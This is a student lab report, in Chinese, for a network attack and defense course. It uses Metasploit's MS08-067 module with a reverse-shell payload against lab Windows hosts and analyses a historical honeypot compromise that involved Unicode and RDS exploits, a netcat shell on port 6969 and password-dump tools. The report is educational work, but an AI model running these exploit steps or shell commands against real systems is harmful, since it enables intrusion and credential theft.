20212935 2021-2022-2 《网络攻防实践》实践六
1 实验目的
熟悉Windows和linux系统结构和安全机制,学会攻击渗透和防御分析,学会漏洞修补。
2 实验环境
Kali、Winxp、Win2k。
3 实验内容
3.1动手实践Metasploit windows attacker
任务:
使用metasploit软件进行windows远程渗透统计实验
具体任务内容:
使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
3.2取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
(1)攻击者使用了什么破解工具进行攻击
(2)攻击者如何使用这个破解工具进入并控制了系统
(3)攻击者获得系统访问权限后做了什么
(4)我们如何防止这样的攻击
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
3.3团队对抗实践:windows系统远程渗透攻击和分析
(1)分析攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
(2)防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
4 实验过程
4.1实践Metasploit windows attacker:
(1)kali中输入命令行msfconsole进入启动msfconsole:
(2)输入命令行search ms08_067查看漏洞ms08_067详细信息:
(3)输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件
(4)输入命令行show options查看攻击此漏洞需要的设置
(5)输入命令行show payloads显示此漏洞的载荷
(6)选择第3个载荷进行攻击,输入命令行set payload generic/shell_reverse_tcp设置载荷、输入命令行set RHOST 192.168.200.124设置要攻击主机、输入命令行set LHOST 192.168.10.52设置本机
(7)输入命令行exploit进行攻击,出现会话连接即攻击成功
(8)输入命令行ipconfig/all查看靶机的IP攻击成功
(9)查看wireshark抓包,可以看到源地址为192.168.10.52 端口号为32905,目的地址为192.168.11.16 端口号为445。
(10)还可以看到攻击利用的漏洞有:针对SMB网络服务的漏洞、DCERPC解析器拒绝服务漏洞、SPOOLSS打印服务假冒漏洞
(11)查看wireshark抓包的TCP流,可以看到靶机中输入的命令行被抓取
4.2取证分析实践:解码一次成功的NT系统破解攻击
4.2.1 查看漏洞
(1)用wireshark打开snort-0204@0117.log文件,输入筛选条件命令ip.addr == 172.16.1.106 and http进行筛选:
(2)选择第37条追踪tcp流,找到特殊字符..%C0%AF..,查询后可知这是存在Unicode漏洞攻击。
(3)选择第149条数据进行追踪tcp流,可以发现有shell及cmd关键字符,查询可知这是存在RDS漏洞
4.2.2 如何破解并控制系统
(1)选择第313条数据追踪其tcp数据流,可以看到执行了很多次都没有成功,说明这次攻击是失败的。
(2)选择第1107条数据并追踪其tcp数据流,可以发现攻击者使用johna2k作为用户名,haxedj00作为密码,下载了nc.exe、pdump.exe、samdump.dll
(3)选择第1224条数据并追踪其tcp数据流,可以发现攻击者执行了cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe命令,连接了6969端口进入交互式控制阶段。
4.2.3 攻击者获得权限后做了什么
(1)以tcp.port==6969作为筛选条件,选择第1282条数据流并追踪其tcp数据流,可以发现攻击者修改了各种文件,删除了ftpcom等文件痕迹。
(2)选择第1361条数据并追踪其tcp数据流,可以发现攻击者利用了SQi注入在靶机系统下生成了一个文件。
(3)选择第2339条数据,追踪其数据流,可以发现ADD关键字符,查询可知这是提升权限。
4.2.4 如何防止这样的攻击
(1)为自己管辖的所有服务器升级
(2)为客户端下载使用于多种平台、多种语言环境的补丁包
(3)停止不必要的服务、关闭不必要的端口
4.2.5 是否发现攻击的是蜜罐网关
(1)选择第4238条数据,并追踪其tcp数据流可以发现此语句,说明发现了是蜜罐网关。
4.3团队对抗实践:windows系统远程渗透攻击和分析
4.3.1 实验环境:
作为攻击方 |
作为防守方 |
||
Kali |
192.168.1.109 |
Win2k |
192.168.1.114 |
Win2k |
192.168.1.111 |
Kali |
192.168.1.105 |
4.3.2作为攻击方
(1)查看是否能ping通对方:
(2)可以ping通,输入命令nmap --script=vuln -Pn 192.168.1.111查看对方是否存在漏洞,可以发现存在ms08-067.
(3)search ms08-067查看此漏洞
(4)输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件,输入命令行show options查看攻击此漏洞需要的设置,输入命令行set payload generic/shell_reverse_tcp设置载荷、输入命令行set RHOST 192.168.1.111设置要攻击主机、输入命令行set LHOST 192.168.1.109设置本机.
(5)输入run进行攻击,可以看到侵入对方,输入md 123、md dkl进行控制对方电脑。
(6)对方电脑打开后发现内部确实被新建了两个文件,说明此次攻击成功。
(7)抓包分析。
4.3.3作为被攻击方
(1)打开wireshark进行抓包,做为被攻击者接受攻击
(2)可以发现我的电脑被攻击者入侵,并在我的桌面建立了如下文件:
(3)分析抓包到的数据,可以看到源地址为192.168.1.105、端口号为38575,目的地址为192.168.1.114、端口为445
(4)选择此数据并追踪其tcp数据流,可以查看到攻击者对我的电脑进行的一系列操作指令。
5 实验中遇到的问题及解决方法
攻击时总是显示失败,也ping不通,后来发现两台设备没有连到同一局域网内,都改成桥接模式后可以ping通了!
6 实验感想
通过这一次内容丰富的实验,我对双方入侵攻击检测有了更深的了解。